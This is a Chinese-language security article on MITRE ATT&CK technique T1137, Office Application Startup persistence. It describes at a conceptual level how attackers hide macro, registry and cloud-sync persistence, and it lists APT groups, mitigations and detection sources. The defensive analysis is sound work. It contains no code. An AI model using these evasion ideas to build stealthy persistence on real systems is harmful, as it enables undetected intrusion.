办公应用启动(T1137)是攻击者利用Microsoft Office组件的合法功能实现持久化的技术,通过修改模板宏、注册表项或云端配置等方式,在Office进程启动时加载恶意代码。防御措施包括监控异常进程树、检测注册表关键路径变更、分析Office文档元数据特征,以及使用专用工具扫描恶意规则和表单配置。
为规避传统检测机制,攻击者发展出多维度的匿迹技术,通过代码动态化、配置仿真化、存储云端化等手段重构攻击链,将恶意行为深度融入Office组件的正常业务逻辑,形成"进程合法、数据加密、行为合规"的新型持久化范式。
现有匿迹技术的核心策略聚焦于攻击载体的形态转换与执行环境的信任滥用:宏代码动态解密加载通过加密存储与内存执行分离代码形态,突破静态特征检测;注册表键值伪装注入利用微软配置规范构建隐形持久化入口;云端配置同步滥用则通过云服务基础设施实现攻击链的分布式隐藏;进程空心化注入彻底消除文件系统痕迹并维持合法进程表象。这些技术的共性在于深度利用Office生态的信任边界,通过合法功能的重定向、业务数据的编码混淆、系统机制的逆向操控,将恶意操作转化为授权行为序列,使得传统基于规则匹配或单点异常检测的防御体系难以有效响应。
匿迹技术的演进迫使防御体系向全生命周期监测转型,需结合内存行为分析、云端配置审计、进程链基因检测等技术,构建跨终端-云端的协同防御框架,并强化对Office组件底层机制的监控能力,以应对日益隐蔽的持久化威胁。
| 效应类型 | 是否存在 |
|---|---|
| 特征伪装 | ✅ |
| 行为透明 | ❌ |
| 数据遮蔽 | ✅ |
| 时空释痕 | ✅ |
攻击者通过仿冒合法注册表项结构、劫持Office进程调用链、伪装云配置同步请求等手段,使恶意持久化机制在注册表路径、进程树关系、网络协议等维度与正常业务操作高度一致。例如将恶意COM加载项配置嵌入标准Office注册表分支,利用数字签名验证机制绕过应用程序控制策略,实现攻击行为的"白名单化"隐匿。
采用多层加密算法对内存驻留代码、云端同步载荷进行混淆,利用HTTPS协议传输恶意配置,使防御方无法通过流量解密或静态分析获取有效攻击指纹。加密密钥通过文档元数据或注册表项分片存储,进一步增加逆向工程难度。
通过云端配置同步实现攻击触发的跨设备异步执行,利用Office 365的全球分布式架构稀释行为特征。恶意代码激活周期与用户办公时间规律同步,采用低频次触发机制(如每月首个工作日),使得异常行为检测的时间窗口大幅扩展,传统基于短期日志分析的检测模型难以有效捕获。
| ID | Name | Description |
|---|---|---|
| G0050 | APT32 |
APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.[1][2] |
| G0047 | Gamaredon Group |
Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the |
| ID | Mitigation | Description |
|---|---|---|
| M1040 | Behavior Prevention on Endpoint |
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. [4] |
| M1042 | Disable or Remove Feature or Program |
Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. [5] |
| M1054 | Software Configuration |
For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. [6] |
| M1051 | Update Software |
For the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.[7] Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.[8] |
| ID | Data Source | Data Component | Detects |
|---|---|---|---|
| DS0015 | Application Log | Application Log Content |
Monitor for third-party application logging, messaging, and/or other artifacts that may leverage Microsoft Office-based applications for persistence between startups. SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.[9] |
| DS0017 | Command | Command Execution |
Monitor executed commands and arguments that may leverage Microsoft Office-based applications for persistence between startups. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.[10] SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.[9] |
| DS0022 | File | File Creation |
Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups. |
| File Modification |
Monitor for changes made to files that may leverage Microsoft Office-based applications for persistence between startups. |
||
| DS0011 | Module | Module Load |
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. |
| DS0009 | Process | Process Creation |
Monitor newly executed processes that may leverage Microsoft Office-based applications for persistence between startups. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously. |
| DS0024 | Windows Registry | Windows Registry Key Creation |
Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.[11][12] |
| Windows Registry Key Modification |
Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.[11][12] |